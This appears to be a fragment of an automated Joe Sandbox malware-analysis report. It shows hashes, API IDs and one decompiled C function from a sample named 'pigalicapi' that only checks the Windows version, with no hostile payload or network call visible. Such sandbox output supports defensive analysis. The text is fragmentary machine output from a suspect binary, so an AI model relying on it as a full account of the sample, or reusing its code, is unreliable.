                                                                                                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                          • String ID: D
                                                                                                                                                                                                                                                                                          • API String ID: 3712363035-2746444292
                                                                                                                                                                                                                                                                                          • Opcode ID: 59bcdaf37b1f271a783006bdc6eef328790e49f0bf96139ab545fec0931b98cd
                                                                                                                                                                                                                                                                                          • Instruction ID: 8c18c5092416b0968d1e58d42d3dcefe862203e4accbbf984a8d418911b9581a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59bcdaf37b1f271a783006bdc6eef328790e49f0bf96139ab545fec0931b98cd
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C011275A4420CABEB10DF90DD45FEE77B9AB04704F148119E6087B2C0D775AA45C7A1
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                                                                                                          			E00804890(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				struct _OSVERSIONINFOA _v156;
                                                                                                                                                                                                                                                                                          				signed int _t9;
                                                                                                                                                                                                                                                                                          				intOrPtr _t16;
                                                                                                                                                                                                                                                                                          				intOrPtr _t19;
                                                                                                                                                                                                                                                                                          				intOrPtr _t25;
                                                                                                                                                                                                                                                                                          				intOrPtr _t26;
                                                                                                                                                                                                                                                                                          				intOrPtr _t27;
                                                                                                                                                                                                                                                                                          				signed int _t28;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t27 = __esi;
                                                                                                                                                                                                                                                                                          				_t26 = __edi;
                                                                                                                                                                                                                                                                                          				_t19 = __ebx;
                                                                                                                                                                                                                                                                                          				_t9 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                                                                                                          				E00816820( &(_v156.dwMajorVersion), 0, 0x90);
                                                                                                                                                                                                                                                                                          				_v156.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                                                                          				if(GetVersionExA( &_v156) == 0) {
                                                                                                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                                                                                                          					return E008159E6(1, _t19, _v8 ^ _t28, _t25, _t26, _t27);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t16 = _v156.dwMajorVersion;
                                                                                                                                                                                                                                                                                          					if(_t16 >= 5 || _t16 == 4 && _v156.dwMinorVersion >= 0x5a) {
                                                                                                                                                                                                                                                                                          						return E008159E6(0, _t19, _v8 ^ _t28, _t25, _t26, _t27);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                                                          0x00804890
                                                                                                                                                                                                                                                                                          0x00804890
                                                                                                                                                                                                                                                                                          0x00804890
                                                                                                                                                                                                                                                                                          0x00804899
                                                                                                                                                                                                                                                                                          0x008048a0
                                                                                                                                                                                                                                                                                          0x008048b1
                                                                                                                                                                                                                                                                                          0x008048c0
                                                                                                                                                                                                                                                                                          0x008048d2
                                                                                                                                                                                                                                                                                          0x008048fd
                                                                                                                                                                                                                                                                                          0x0080490f
                                                                                                                                                                                                                                                                                          0x008048d4
                                                                                                                                                                                                                                                                                          0x008048d4
                                                                                                                                                                                                                                                                                          0x008048dd
                                                                                                                                                                                                                                                                                          0x008048fc
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008048dd

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Version_memset
                                                                                                                                                                                                                                                                                          • String ID: Z
                                                                                                                                                                                                                                                                                          • API String ID: 963298953-1505515367
                                                                                                                                                                                                                                                                                          • Opcode ID: 184aad86be3523dac1ccd0e82ca554ba7613b3cd2dde36fde422480d49303174
                                                                                                                                                                                                                                                                                          • Instruction ID: 99507a91cfaab82b2e26671cac42c102c8644f7ca47fc806e9604a01009fbdad
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 184aad86be3523dac1ccd0e82ca554ba7613b3cd2dde36fde422480d49303174
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5EF04970A4010C9BDB60DB74ED42BADB7F9FF05704F4044A9D60ED62C2DA315E94CB52
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%